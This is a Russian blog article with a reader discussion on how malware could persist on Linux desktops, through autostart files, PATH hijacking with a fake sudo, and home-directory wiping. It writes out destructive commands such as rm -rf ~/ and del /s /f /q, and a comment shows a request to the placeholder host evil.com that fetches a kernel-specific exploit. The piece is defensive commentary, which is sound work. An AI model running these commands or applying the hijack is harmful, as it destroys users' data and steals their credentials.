Linux, безопасность, подумаем о будущем

    Часто можно встретить мнение, что linux безопасен. Пока — это действительно верно, никто особо тщательных усилий на создание атакующих программ не предпринимал, поэтому и создаётся иллюзия безопасности. Однако давайте попробуем сами заранее обратить внимание на те вещи в linux-системе, которые в будущем могут заинтересовать злоумышленников.

    Данная статья не претендует на полноту обзора проблем, я хочу пока только обозначить контуры проблемы, которая уже существует, но пока никак особо не решается. Некоторые из описанных методов защиты можно заставить работать уже сейчас, некоторые — надо заставлять реализовывать авторов системного софта.

    Update Почему-то для некоторых читателей общая идея статьи оказалась непонятной, поэтому пропишу явно: идея в том, чтобы показать некоторые конкретные примеры применения известных атак (если можно это назвать «атакой», конечно) в именно linux-окружении. Linux — ничуть не безопаснее в некоторых аспектах, чем другие системы.



    О способах проникновения говорить смысла нет, вредный софт всё равно просочится на любую систему. И никакой антивирус не поможет. Также не будем особо углубляться в типы вредоносного ПО, пусть это будут «троянцы» и «вредители». Троянцы — это разнообразные кейлоггеры, похитители паролей и прочие шпионы. Вредители — это стиратели документов и разрушители системы. Далее всё это буду называть одним словом «вирус». Также опустим вопрос вредительства на системном уровне, то есть будем считать, что вирусу в /usr/bin не пробраться.

    Автозапуск


    Итак, вирус в системе, например, через дырку в libflash запустился скачанный бинарник; для выживания ему нужно прописать себя в автозагрузку. В современной системе для этого есть множество разнообразных способов, часто крайне трудно вычислимых. В каждом Desktop Environment (DE) существует несколько способов запускать приложения при старте DE. Например, в KDE есть каталог ~/.kde/env, все файлы из которого выполняются при загрузке системы, аналогично работает каталог ~/.kde/Autostart (между этими двумя каталогами есть разница, но в рамках данной статьи она несущественна). Достаточно положить туда исполнимый файл-скрипт для запуска вируса и всё. Более хитрый вариант — просканировать этот каталог и встроить команду запуска уже в существующий скрипт.

    О такой мелочи как маскировка имени вируса в списке процессов даже и не говорим. Вирус без проблем может выдавать себя за что угодно.

    Помимо средств DE остаются разнообразные стартовые скрипты типа ~/.xsession или ~/.profile, или .zshrc. При большом желании, наверное, можно даже в ~/.fonts.conf какую-нибудь разрушительную дрянь засунуть.

    Как бороться? Никак. Пока никаких средств надёжного контроля нет, с бардаком в скриптах никто (из авторов софта) особо не заморачивается. Параноидальное решение — считывать хешсуммы от критичных пользовательских файлов-конфигов и хранить их в месте, недоступном для изменения со стороны пользователя. Затем при запуске все хешсуммы проверять.

    Маскировка


    Помимо прописывания себя в файле автозапуска, вирус может добавить кучу полезной для него информации в конфигурационные файлы. Одной из самых привлекательных целей может стать переменная окружения PATH. Напомню, что в этой переменной хранится список путей, которые будут испробованы для поиска исполнимой программы. Обычно переменная PATH выглядит примерно так: /usr/bin:/bin, а вирус может её модифицировать как ~/bin:/usr/bin:/bin. Чревато это тем, что теперь программа, набранная без указания полного пути, будет сначала искаться в пользовательском каталоге, а уж потом в системных. А в пользовательском каталоге будет лежать заботливно подложенная вирусом программа с названием ssh или sudo; пользователь ничего не заметит, а введённые им критичные данные благополучно сольются.

    Решение? Использовать только полные пути при запуске программ. Однако это не гарантированная защита. Более надёжным решением было бы ограничивать доступ к модификации критично важных переменных окружения.

    Вредительство


    Здесь всё совсем грустно. Как правило для нанесения максимального вреда достаточно одной команды — rm -rf ~/. После этого можно попрощаться со всеми данными.

    Также ничего не мешает зашифровать все данные в домашнем каталоге, как это делают некоторые виндовые вирусы.

    Также возможно и более мелкое вредительство, например, прописывание в конфиги браузеров всякой дряни (подмена домашней страницы, например). Централизованно бороться с таким невозможно, тут должны авторы приложений разбираться.

    Несомненно, злоумышленникам значительно облегчит жизнь стандартность расположения профайлов приложений. Например, почти всегда профайл Оперы будет лежать в каталоге ~/.opera. Так что частично можно спастись, меняя стандартные пути профилей, многие приложения позволяют это делать.

    Выводы


    Достойная защищённость требует изрядной доли паранойи. Значительно осложнить жизнь вирусу поможет система контроля запускаемых приложений (сравнение хешсумм исполнимых файлов и скриптов). Запретить «зацепиться» на диске можно запретом на запись на этот самый диск. При этом нужно всё-таки обеспечить какой-то способ модификации конфигурационных файлов.

    Описанные способы и варианты — это лишь то, что приходит в голову при попытке задуматься о проблеме. Наверняка, найдутся ещё какие-нибудь особо изысканные методы (типа использования ~/.fonts.conf), но для начала хватит и этого. Вот только производители софта, в том числе и системного, над вопросами такой вот примитивно-бытовой безопасности не задумываются особо. А надо бы.
    Поделиться публикацией
    Реклама помогает поддерживать и развивать наши сервисы

    Подробнее
    Реклама
    Комментарии 262
    • –9
      Что бы вирусописатели начали активно писать вредоносный код под линукс он должен быть чертовски популярен, это раз.
      Пользователи linux обладают знаниями для выявления вирусов и удалить их не составит труда.

      Да и врядли те кто сейчас пользуется линуксом настолько глупы что бы ходить по сайтам megapornosait.com
      Загрузка софта происходит из официальных репозитариев что исключает появление там вредоносного кода.

      Т.Е. всё написанное конечно хорошо но бум вирусов под лиункс не светит нам
      • +15
        Пользователи линукс обладают знаниями? Правда?

        Расскажите это мамочкам, которых заботливые сыновья пересадили на убунту, потому что она круче и антивирус не нужен.
        • +5
          сомневаюсь что взламывать комп такой мамочки комуто нужно, чтобы украсть пароли от однокласников не нужно ломать систему.

          И посчитайте сколько таких вот «мамочек» от числа общего числа линуксоидов? а самих линуксоидов то не так много.

          Винда намного выгоднее с точки зрения компьютерного злодея: ниже IQ пользователей, дырок больше, фиксы реже и тп.
          • +6
            Нужно, и взламывают, а потом от имени этой «мамочки» рассылают спам и прочий шлак (в том числе вирусный) другим пользователям. Всё в автоматическом режиме.
            • –17
              Когда-то давно(в октябре 2004) редакция CHIP проводила тест на саму защищенную операционку.3 претендента Mac OS(10.3.3),WinXP SP2 и Linux(SuSe 9.1 prof).Перепечатывать не имеет смысла, но суть такова, что при своевремменом и регулярном обновлении WinXP считалась самой защищенной.Времени прошло очень много с тех пор, но обновления для win вроде выходят чуть ли не каждый день даже сейчас.
              • +12
                пфф. Ну попробуй сломать мой мак, у меня наружу смотрит только ssh. все сервисы для лично пользования на локалхосте, соедениние с другими моими маками осуществляется через ipsec (спасибо me.com). Любые действия админитратора требуеют пароль администратора, все настройки заблокированы, к Keychain дается доступ только к заранее разрешенным приложениям (приэтом использую несколько связок, чтобы скомпроментировав одну связку, не отдвать все остально), если приложение изменяется доступ к связке запрещается. После 10 минут простоя keychain закрывается опять до востребования.

                теперь о сервере:
                стоит фряха, наружу много портов открыто (из них больше половины пробрасывается в корпаративную сеть). в кроне висит freebsd-update. на почту сыпятся SA. каждый вход систему или использование sudo отправляет мне месейдж в жаббер. чтобы подменить $PATH для этого надо как-то попасть в систему, а такие уязвимости редкость для подобных системах. sudo не запрашивает пароль только на определенные список приложений.

                p.s.
                нет я не параноик, я просто люблю защищать свои приватные данные от не своих глаз.
                • +1
                  «Даже если вы абсолютно уверены в том, что у вас мания преследования, это вовсе не значит, что за вами не следят» :)

                  P.S. Ничего личного, просто вспомнилась цитата :)
                  • +3
                    вы не првильно написали… «даже если у вас нет паранои, это не значит, что за вами не следят» как-то так. на настройку всего этого над десктопе у меня ушло минут 10 (еще забыл про filevault расказать :) ), я дольше воллпепер выбирал.
                    • +2
                      Да, в самом деле у кого с чем проблемы :)

                      Осталось написать обширный пост про выбор обоев :)
                      • +1
                        что тут смешного? я последний раз обоину выбирал часа 3-4 не меньше. Вот результат:
                        photos-b.ak.fbcdn.net/hphotos-ak-snc3/hs146.snc3/17356_1312392659135_1510225275_823558_5037226_n.jpg
                        • 0
                          Эмм… хочу такую же, можно ссылку на первоисточник?
                          • +1
                            https://dl.dropbox.com/u/963415/She-loves-her-sword.jpeg
                            • НЛО прилетело и опубликовало эту надпись здесь
                            • 0
                              Скажите, а для чего вы используете freenet? Я как-то ставил, игрался, но дальше не пошло.
                              • 0
                                точно так же. правда у меня там есть пару знакомым которым сыкотно некоторые темы обсуждать за пределами фринета.
                      • 0
                        Как вы реализовали отправку сообщения в джабер при входе в систему?
                        • 0
                          Наверное, через .login|.profile|.bash_profile, или что у него там настроено в качестве шелла.
                          • 0
                            login скрипт?
                          • 0
                            Я так понимаю, речь идёт о среднестатистическом пользователе, а не гике-параноике.
                            Насколько я помню, именно от программных эксплоитов и выполнения вредоносного кода через дыры в приложениях Мак ОС 10 защищена намного хуже Винды — у Майкрософт большой опыт в деле латания дыр :)
                            • 0
                              большая часть ПО в base system заимствована из bsd, и разработка спонсируется apple. только вот в винде получить доступ администратора намного проще чем в макоси в базовой установке. И я не гин-параноик, просто кликнул в пару мест.
                            • 0
                              А на .bash_profile требуются права записи пользователя? Если владелец у файла будет root, а пользователь только execute, как вирус пропишет $PATH?
                              • +1
                                Еще можно вспомнить SELinux, или Grsecurity.
                              • 0
                                через что отправка в джаббер реализована?
                                • 0
                                  sendxmpp, он есть в портах. отправляет все что удого, что можно передать в pipe.
                          • +4
                            ладно мамочки и иже с ними. я сам, уверен, на долгое время смогу приютить у себя зловреда, не обнаружив его. Если в винде я уже знаю откуда ожидать подвоха, как защищаться и при необходимости выкорчевать зловреда руками, то моего годового опыта с десктопным линуксом явно для этого не достаточно. Успокаивает меня пока одно, что даже при всём обилии зараз под винду, при активном сёрфе в винде без антивирусов я умудряюсь их обходить стороной.
                            Вопрос очень актуальный с учётом приличных темпов одомашнивания линуксов.
                            • 0
                              >Если в винде я уже знаю откуда ожидать подвоха, как защищаться и…
                              — так же и пользователь линукса знает, откуда ожидать подвоха. а если это мамочка, то я имею в виду ее сына, который ей поставил систему.
                              • –1
                                я сам пользователь линукса, если это не понятно из коммента. Не совсем дуб, но эффективно пользовать grep, awk, lsof, etc не умею. Ну не было времени у меня докурить маны. С удовольствием восполнил бы пробелы если найду адекватную к восприятию литературу на эту тему.
                                • 0
                                  навскидку, самое банальное:
                                  вы не знаете, что не надо работать под рутом?
                                  вы не читаете, зачем система просит пароль, если она его вдруг просит?

                                  а когда линухи станут более популярны, будем учиться дальше. я, например, зашла в этот топик, чтобы почитать, что скажут умные люди в комментах. и таки почепнула кое-что:)
                                  • 0
                                    знаю, но это не панацея. вирус и в юзермод может нагадить, а для этого не нужны рут права.
                                    конечно я не ломлюсь скачивать и ставить всякую ерунду, но у меня нет уверенности, что рано или поздно браузер, через какую-нить дырочку не сохранит *.desktop файл в автозагрузку с запуском env python ~/.virus/virus.pyс и ему не понадобится chmod +x при этом, а там и привилегии поднять можно попытаться.
                                    Разные дистрибутивы и ядра — скажет кто-то. GET evil.com/get0day?uname=2.6.31-16-generic+%2352-Ubuntu+SMP+Thu+Dec+3+22%3A07%3A16+UTC+2009+x86_64+GNU%2FLinux — скажет малварь.
                                    • 0
                                      а ещё я обычный юзер и хочу, чтобы у меня работал ТВ-тюнер. Для этого я добавляю некий ppa для решения проблемы.
                                      Теперь убедите меня, что администратор этого PPA не может «поделиться» доступом к нему, через какую-нибудь CSRF.
                                      А дальше всё просто: апдейт в репозитории — и у меня живёт «друг» о котором я не подозреваю.
                                      Конечно же это не червь и сам он особо не распространится (хотя по ssh в known_hosts я думаю он пройтись не поленится), но когда я лишусь своего ящика на gmail и всех сопутствующих учёток, мне уже это будет не интересно.
                                      • НЛО прилетело и опубликовало эту надпись здесь
                                        • 0
                                          В PPA пакеты легко добавлять, но за ним следят, и троянец просидит там до первой же жалобы, то есть совсем недолго.
                            • 0
                              Фигню пишете. Даже самый десять раз опытный пользователь может и не заметить, что у него команда «sudo su -» ссылается на вирусный ~/bin/sudo, а не на системный /usr/bn/sudo.

                              Дырки в софте никто не отменял. Ссылки типа «вот моя фотка, зацени www.site/foto.sh» вполне проканают
                              • –1
                                да поймите что вы искусственно привязываете ситуацию к linux системе. Это все возможно и на windows и на mac. Почему именно linux?
                                • +12
                                  Блин, а в статье речь о чём? Именно об этом!
                                • +46
                                  >вот моя фотка, зацени www.site/foto.sh

                                  Ага и инструкция снизу с chmod +x foto.sh && ./foto.sh =)
                                  • +2
                                    мне на .jar приходят частенько ссылки, а они мало того, что кроссплатформенные, так еще и не требуют вышеозначенных действий.
                                    • 0
                                      Зато требуют установки программы весом в 20 мб.
                                      • 0
                                        у Вас JRE не стоит?
                                        • 0
                                          Нет, честное слово. Вообще не очень часто мне приходится сталкиваться с Java, ведь Java еще не столь популярна как тот же самый Flash. Но разве у Java нет встроенной системы безопасности, которая не дает приложениям делать то что им не нужно?
                                          • +2
                                            Если не ошибаюсь, то это касается только апплетов. Если запустите приложение у себя на компе, то ограничений, вродь, нет.
                                            • +3
                                              Будут ограничения того юзера, под которым запущена JVM. А в линухе, я так думаю, люди под рутом не сидят и читают, нафига у них система пароль спрашивает.
                                              • 0
                                                Пусть не под рутом, но вирус уже поселится. И как написали в стать заменит собой sudo, будет ждать пока пользователь не выполнит чтото от рута, и все.

                                                И к тому же для рассылки спама, ддоса, перебора паролей и пр. должно хватить прав и обычного пользователя.
                                                • 0
                                                  Ну, в данном треде обсуждается уже скорее пример социальной инженерии и он мало имеет отношение к безопасности ОС.
                                          • 0
                                            А что, вы думаете он прям так и запустился? А по-моему +x ему тоже не помешает, это если binfmt настроен правильно, а так запускать придется через скрипт же.
                                            • +2
                                              кстати да, jar надо или через java -jar или binfmt, но тогда x-флаг должен стоять.
                                              В бунте, кстати, binfmt идёт настроенный, а вот явы по умолчанию нет. и ff вроде как не сохраняет файлы с +x, или я неверно помню?
                                      • 0
                                        «Консоль в современных юзерсфрэндли дистрибутивах, как мифическая точка G, все знают, что она есть, но найти её очень сложно.» (с) bash.org.ru

                                        Сейчас приходится лазить по менюшкам в поисках консоли. А когда linux достигнет той популярности на desktop-системах, при которой будет иметь смысл писать вирусы, консоль может быть вообще будет возможно вызвать только через single mode.
                                        • 0
                                          Лазить по менюшкам не приходится. Если вдруг linux деградирует до описанной вами стадии, уйду на *bsd или OpenSolaris, подозреваю, что большинство теперешних ползователей тоже. Так что к тому времени «проблема вирусов в linux» нынешних пользователей этой системы волновать не будет.
                                          • –7
                                            Никто не говорит, что именно так и будет. Просто дистрибутивы вроде Ubuntu именно до такого уровня и опустятся.
                                            • +1
                                              Вы, по всей видимости, счастливый обладатель машины времени, раз так смело утверждаете. Но что-то вот user-friendly Mac OS X позволяет запустить Terminal и не в Single. Он лежит себе спокойно в Applications/Utilities.
                                              • +2
                                                Ты Убунту то видел? Или только на картинках? О безопасности там много думают и в нужную сторону
                                              • 0
                                                OpenSolaris — одна из немногих nix-ОСей, с которую я держал в руках. Консоль не понадобилась, так что даже искать не стал :)
                                              • +1
                                                Видимо вы не пользуетесь консолью, вот и ищите. У меня это F12.
                                                • 0
                                                  win+ — т — первая выдача gnome-do, ну или тильда, для чего-то быстрорастворимого. В гуях удобственно жутко.
                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                    • 0
                                                      alt-1 на десктопах, ctrl-1 на нетбуке (там по альту никак не научусь попадать) :)
                                                      • 0
                                                        yakuake/guake тоже рулят. :) Особено где-то с 20% прозрачности.
                                                      • +2
                                                        Ctrl+Alt+F1
                                                    • +2
                                                      «вот моя фотка, зацени www.site/foto.sh» — такое канает независимо от системы))
                                                      а тут вроде конкретно о *nix
                                                      • –3
                                                        Это был пример того, что и «классические» методы тут вполне работают.
                                                        • 0
                                                          Да в том то и юмор, что не работает это. Чтобы это сработало, у вас в системе файлы с расширением sh должны открываться интерпретатором. Я сомневаюсь, что такая настройка включена.
                                                      • +3
                                                        А что толку от этой ссылки? Это же не windows. Файл сохранится без права на выполнение. При его открытии система услужливо запустит блокнот или спросит что с этим файлом делать.
                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                        • –9
                                                          Загрузка софта происходит из официальных репозитариев что исключает появление там вредоносного кода.

                                                          Вы в этом уверенны, что там исключено появление вредоносного кода?
                                                          habrahabr.ru/blogs/linuxnotforall/77838/
                                                          • +2
                                                            это не официальный репозитиорий
                                                          • +1
                                                            Не думаю, что хотя бы четверть пользователей Linux знают, как найти или удалить вирус.

                                                            Естественно, если это Linux с Иксами.
                                                          • +4
                                                            В любой ОС если иметь необходимые права можно спрятаться так что тебя никто не найдет. В linux, действительно, таких способов больше, но это никак не ухудшает безопасность линукса в сравнении с windows.

                                                            Когда такая проблема станет актуальной напишут «дружелюбный» chroot в котором будут выполнятся все новые программы и будет всплывалка с вопросом о разрешении каждого действия как в виндовс, но это уже борьба с последствиями, безопасность начинается задолго до того как вредоносный код будет запущен и во многом лежит на плечах пользователя. Безопасность системы дело рук пользователей :)
                                                            • –3
                                                              В чруте тоже можн замечательно нагадить.
                                                              • +1
                                                                я не говорил о чистом chroot, но тем не менее что плохого можно сделать в чрут с не root правами?
                                                                • 0
                                                                  Слать спам, например.
                                                                  • 0
                                                                    ну развеж это плохо? в чруте, в песочнице при запуске начнет спамить — в топку такой софт :)
                                                                    • +1
                                                                      Это если вовремя понять, что оно спамит. А можно ведь и не заметить.
                                                                      • 0
                                                                        Netstat что ли сложно разок глянуть, раз уж софт в песочнице запускаете
                                                                        • 0
                                                                          Мамочке вывести монитор сети в панель и сказать смотри — если ты кино не качаешь, а вот тут у тебя всё жёлтое, значит кричи караул.
                                                                          • 0
                                                                            Как вы правы! Я совершенно серьезно, без всякой иронии!

                                                                            Грамотное организованное оповещение о неполадках или несанкционированном доступе — это очень нужная вещь.
                                                                            • 0
                                                                              так и я, собственно, без шуток)
                                                                              А ещё можно прикрутить мониторинг tcp/ip с отсылкой лога себе на почту и наблюдать за состоянием аплоада. Ну, это уже для эстетов.
                                                                              В принципе и в виндах подобное есть, но там это покрыто всё тайнами.
                                                                              • 0
                                                                                Штатных и при этом наглядных вещей, пожалуй, нет. А сторонние, ZoneAlarm, например — вполне. И кричит, если что не так, и индикаторами расхода трафика мигает :)
                                                                • +6
                                                                  ru.wikipedia.org/wiki/AppArmor

                                                                  Вот такая штука в дистрибутивах сейчас есть
                                                                • +4
                                                                  Описанное здесь применимо лишь к случаю «одного пользователя». т.е. если и появится какой-то «вредитель» и попытается проделать все описанное выше (в том числе и rm -rf ~/), то навредить получится лишь тому пользователя, который запустил этого «вредителя» (тут как говориться «сам виноват!»). Остальные же пользователи не пострадают, если конечно пострадавший пользователь не был root. :-) Если же вы пользуетесь root'й учетной запись в системе(что по определению не безопасно), тут вам уже ничего не поможет.
                                                                  А вообще я бы посоветовал backup'пить все критические данные и не когда «сидеть» под учетной записью root, тогда вас никто не страшен!
                                                                  • +4
                                                                    все что написано выше применимо к любой операционной системе.
                                                                    • 0
                                                                      в винде не поможет. многое ПО требует админские права. А каждый раз давать эти права всем лень :)

                                                                      p.s.
                                                                      повесил проверку $PATH на изменения
                                                                      • 0
                                                                        Да из современного ПО — уже немногое. Народ одумался :)

                                                                        Раньше да, проблема была серьезная.
                                                                    • +2
                                                                      А какая разница для десктопа, удалены данные одного пользователя или система? Время восстановления системы без учета ~/ — десяток минут.
                                                                      • –2
                                                                        А время восстановления удаленных данных?
                                                                        • 0
                                                                          Зачем восстанавливать систему? Система не скомпрометирована. А вот пользовательские данные — самая важная часть — уже всё, тютю.
                                                                          • 0
                                                                            «Самая важная часть», обычно, имеет бекапы, число и регулярность которых прямопропорционально важности этих данных.

                                                                            Иначе выходят «взаимоисключающие параграфы».
                                                                        • +1
                                                                          мне не будет легче от того, что кроме юзера roman на компе будет ещё какой-то юзерь pasha, vanya или petya и при этом я сделаю sudo rm -rf ~/. Уже лучше систему бы снесло, чем мои данные. и это кстати, реальный случай. После этого я дропбокс поставил :)
                                                                          • 0
                                                                            Линукс в плане устойчивости системы от сбоев, а также в возможностях восстановления в случае, если они произошли, намного лучше продуктов от Микрософт (если пользователь соблюдает элементарные правила безопасности и не работает под рутом).

                                                                            Однако, остается проблема уязвимости от утечек личных данных (адресной книги, писем, документов). Ведь с ростом возможностей того же браузера, растет и возможности скриптов, которые выполняются в его окружении, в том числе и зловредных. Браузер становится чем-то вроде операционной системы.

                                                                            Защитить личные данные в ОС, что в Линуксе, что в Виндовз, одинаково сложно, и вряд ли это возможно сделать с высокой степенью надежности штатными средствами.
                                                                            • +1
                                                                              отсутствие IE счастье линуксиодов :)
                                                                              • 0
                                                                                Вот так вот, скажешь что-нибудь про Линукс и сразу минус один, для кармы лучше петь хвалебные оды Биллу :)

                                                                                Ок. Еще один сильный фактор на стороне Линукса это его открытая архитектура, которая базируется на разработках 60-х и за время своего существования была проинспектирована тысячами разработчиков/исследователей из самых различных школ и направлений.
                                                                            • 0
                                                                              какие «остальные пользователи»? PC — на то и PC чтобы быть персональным, особенно если это ноут
                                                                              rm -rf ~/ не уронит систему, но для меня будет неприятной командой
                                                                            • +3
                                                                              И еще:
                                                                              1) просто пользователь не может писать в /usr/bin не имея специальных прав;
                                                                              2) у каждого пользователя свое переменное окружение
                                                                              • +1
                                                                                Прочтите внимательно статью, там специально упоминается, что вредительство в локальном каталоге пользователя. И что в этом случае вредительство не становится менее действенным.
                                                                                • +5
                                                                                  Я считаю потенциально опасным компрометирование целевой системы, что не возможно (при отсутствии открытых дыр!) в описанной вами ситуации.
                                                                                  А проблема вредительства пользователю, как я писал уже выше, решается методом backup'a критически важной информации.
                                                                                  • 0
                                                                                    Бэкап не спасает, в бэкапе замечательно может сидеть вирус тот же самый. А пользователь — работать и не подозревать, что у него вся инфа постоянно сливается.
                                                                                    • 0
                                                                                      Зачем в домашнем каталоге держать исполняемые файлы?
                                                                                      После воостановления из бекапа можно убрать со всех файлов флаг выполнения.
                                                                                      И переустановить каталог ~/bin/ если таковой имеется.

                                                                                      В linux невозможно положить вирус в папку чтобы он запускался при открытии этой папки, под виндой такие чудеса катят. :(
                                                                                      • –2
                                                                                        В каком-нибудь новомодном DE запросто такая фишка может быть. Те же самые превьюшки для каталогов в файлменеджерах. Никаких отличий от винды по сути.
                                                                                        • +1
                                                                                          А если без «если»?
                                                                                          Приведите хоть один конкретный пример!
                                                                              • +12
                                                                                Для этого есть всякие SELinux и AppArmor, разве нет?
                                                                                • –11
                                                                                  Безусловно, но они пока для персонального использования непригодны.
                                                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                                                  • –10
                                                                                    AppArmor это и есть SELinux =), только упрощенный. Также как и suse-брандмауэр это надстройка над iptables =)
                                                                                    • 0
                                                                                      AppArmor и SELinux это две различные, конкурирующие технологии со своими достоинствами и недостатками.
                                                                                    • 0
                                                                                      Да, selinux даже позволяет разрешать приложениям только какие-то сетевые подключения, то есть тот самый случай со спамом из chroot, selinux способен зарезать.
                                                                                    • +3
                                                                                      Описанные в статье проблемы есть в любой ОС.

                                                                                      Автозапуск — В Windows можно найти не меньше способов. HKCU\Software\Microsoft\Windows\Run, Пуск — Автозагрузка, различные надстройки для IE, хелперы для контекстных меню в проводнике, хелперы для страниц свойств и т. д.

                                                                                      PATH — В Windows тоже есть. Просто консольных маньяков меньше. Более точный аналог — поменять путь к исполняемому файлу в ярлыке. Мало кто запускает напрямую из каталога Program files.

                                                                                      rm -rf ~ — del /s /f /q c:\users\username\documents (или какой там путь)

                                                                                      Стандартность путей конфигов — о да, а в других ОС они разве нестандартные? %appdata%\Opera. Даже если сделать нестандартным, то браузер откуда-то берёт этот путь, а значит сможет и вирус. Никакой проблемы и нулевая защита в общем.
                                                                                      • +3
                                                                                        вот и я говорю, что это статья не про потенциальную «не безопасность» linux, а про возможные действия вредоносного кода! И актуально это для любой системы!
                                                                                        • +3
                                                                                          Речь не про windows, а про конкретные примеры, как это же самое можно сделать в линуксе. Чтобы развеять иллюзии о заведомой безопасности линукса.

                                                                                          Некоторые особенности именно что для линукса харакетрны, например, оперу ту же самую часть ставят не в профиль, а в каталог установки и профайл оперы лежит где угодно на диске, а вовсе не в C:\Users или подобных местах
                                                                                          • –2
                                                                                            Сразу скажу, что можно так и под линуксом поступить (с оперой), но это — не способ распространения приложения по умолчанию. По умолчанию именно пакетный с профилем в ~/.opera
                                                                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                                                              • 0
                                                                                                Есть средства по предупреждению фишинга, они во всех уважающих себя браузерах стоят, в идеале вместо кидального сайта должна появлятся табличка, что этот сайт кидальный. Хотя в реальности народ часто забывает сообщить о вредоносном сайте куда следует. Но у него и кнопки это сделать обычно нет под рукой. Но в целом, пока интернет будет оставаться страной непуганых идиотов, всяким фишерам там будет раздолье. А это значит нужно повышать граммотность населения
                                                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                  • +4
                                                                                                    > Я бы сказал немного утрируя: Linux не безопасен, потому что пользователь установил Windows.

                                                                                                    Я бы перефразировал как: «Linux не безопасен, потому что с ним работает пользователь, который перешел с Windows»
                                                                                                    А пользователь, который привык устанавливать софт из официальных репозиториев меньше всего будет пытаться устанавливать какие-то SuperBrowser-ы :) и запускать всякие левые бинарные файлы
                                                                                                    • +2
                                                                                                      Ну не поставит он его в Линуксе, просто не осилит. Это же нужно руками пакет достать, отключить предупреждение об опасности, удостоверится, что все зависимости скачались, а если зависимостей не хватает то и вовсе облом.
                                                                                                      А те, кто всё это осилят сделать, не побегут ставить супермегавасябраузер.
                                                                                                      В общем вы не сможете эпидемию организовать, хоть убейтесь
                                                                                                      • 0
                                                                                                        Ну не поставит он его в Линуксе, просто не осилит. Это же нужно руками пакет достать, отключить предупреждение об опасности, удостоверится, что все зависимости скачались, а если зависимостей не хватает то и вовсе облом.
                                                                                                        Что-то мне подсказывает, что если вредоносная программа попытается выдать себя за пакет с некой безобидной программкой, то там постараются не делать зависимостей вообще. Как раз, чтобы поставилась в максимуме случаев.
                                                                                                • 0
                                                                                                  Чтобы профиль оперы лежал где-то отлично от ~/.opera и опера могла что-то туда писать — надо дать пользователю, который запускает ту самую Оперу права на запись в это нестандартное место (предположим, что это /tmp) но первая же перезагрузка убьет весь профиль и прочее барахло (если это опять-таки пресловутый /tmp). Давайте на вскидку вспомним краткий перечень каталогов, в которые может что-то записать непревелигированный пользователь?
                                                                                                  И да, опера, на сколько я помню, из своих GUI не позволяет менять путь к профилю, разве что в config:opera или как это там называется. Но раз уж чувак долез до такого тонкого тюнинга, то мозгов на поиск и удаления вредноносного кода из системы у него хватит. Мама-домохозяйка явно оставит всё как есть. И никуда ваш оперный профиль из домашнего каталога не денется.
                                                                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                                                              • +7
                                                                                                И, тем не менее, на данный момент самый популярный способ распространения вирусов под Linux: «О! Дай посмотреть!».
                                                                                                • –2
                                                                                                  Это всё оттого, что этот же способ — пока самый популярный способ распространения и самого линукса :)

                                                                                                  з.ы. а заметка как раз о том, что в плане локальной безопасности не нужно расслабляться. И отличий тут от других систем мало. Распространение вирусов на 99% обусловлено человеческим фактором, а не самой системой.
                                                                                                • +46
                                                                                                  Ну, как-то так:
                                                                                                • +1
                                                                                                  и nosuid для ~ очень даже реален, и что тогда?
                                                                                                  • +18
                                                                                                    Если враг получил доступ даже к пользователю, то уже поздно пить боржоми. Это всёравно, что пытаться остановить уже проникнувших в квартиру грабителей. И это очень сложно, гораздо проще более хороший замок на дверь поставить. А надежность Линуксу серьезно повышает простота установки софта из репозиториев и сложность сделать тоже самое в их обход
                                                                                                    • +1
                                                                                                      Для выполнения `rm -rf ~/` надо иметь отдну не существенную мелочь, которая не ведома многим кто использует форточки — эта не значительная вещь права!

                                                                                                      Из под обычного пользователя вирус не сможет воспользоваться rootkit механизмами и скрыть своё присутствие и как либо навредить или внедриться в систему. Максимум что он сможет сделать — это нагадить текущему пользователю.

                                                                                                      А вот получение необходимых прав да и просто не санкционированный запуск в Unix-like и в Windows это небо и земля.

                                                                                                      +к этому централизованные репозитории с проверкой подлинности пакетов.

                                                                                                      Из предыдущего плюса вытекает еще один — чёткий контроль над изменением исполняемых файлов. Т.е. любую поврежденную программу (висусом или просто сбоем) можно без всяких проблем восстановить в первоначальное состояние.

                                                                                                      Я считаю что разглагольствовать о безопастности это удел специалистов а не домохозяек.
                                                                                                      • +1
                                                                                                        Чисто гипотетически… я бы потратил много сил, чтобы взломать сервер с репозиторием и подменить файлы и чексуммы, а потом дать зеркалам с меня обновиться ;).
                                                                                                        Вот это будет эпикфейл…
                                                                                                        • +1
                                                                                                          … будь я на месте вредителя, конечно )
                                                                                                          • +1
                                                                                                            ну так попробуйте, или там по вашему не проверяется что за файлы в репозитории и какого они там делают?
                                                                                                            • +7
                                                                                                              Чисто гипотетически помимо взлома зеркала еще нужно получить RSA ключ маинтейнера, тупая подмена пакетов на затрояненные — ни к чему не приведет.
                                                                                                              При обновлении каждая система выдаст предупреждение безопастности и не установит не подписанные пакеты.
                                                                                                              • +1
                                                                                                                Чтобы не быть голословным — Отчёт о расследовании Debian взлома серверов (2003й! год)

                                                                                                                Тогда еще кастати пакеты не подписывались.

                                                                                                                Вообще вопрос сводится к тому «что проще сломать, как быстро это всплывёт и какие будут последствия»
                                                                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                                • +5
                                                                                                                  чувак, ~/ — домашний каталог, на удаление файлов внутри него у обычного пользователя права наверняка есть.
                                                                                                                  • –2
                                                                                                                    Ну да, домашний каталог пользователя снести можно. А толку? Проникнуть в систему и оставаться там не замеченным это не поможет.
                                                                                                                    Сейчас написание вирусов превратилось из баловства в бизнес, какой профит с удаоления пользовательской информации?
                                                                                                                    • +4
                                                                                                                      Пользователю без личных данных (годовой отчет, недописанный диплом, наполовину завершенный проект) будет офигенно весело конечно. Пофигу что несколько недель работы накрылось, зато система стоит!

                                                                                                                      Вы же не думаете, что среднестатистический пользователь компьютера покупает его только ради ОС?
                                                                                                                      • +2
                                                                                                                        Вирусописателю какой профит с того что пользователь убъёться об стену?
                                                                                                                        • +1
                                                                                                                          Предложит SMS отправить на короткий номер, до того как все снести.
                                                                                                                          • +4
                                                                                                                            Перезагрузить иксы зайти под другим пользователем и снести нахрен это горе блудной мысли.

                                                                                                                            Находясь под обычным пользователем у вируса очень мало возможности манипулировать и ставить свои условия — места автозапуска можно перещитать по пальцам, обнаружить и прибить процесс не проблема — чирикнуть он не успеет.

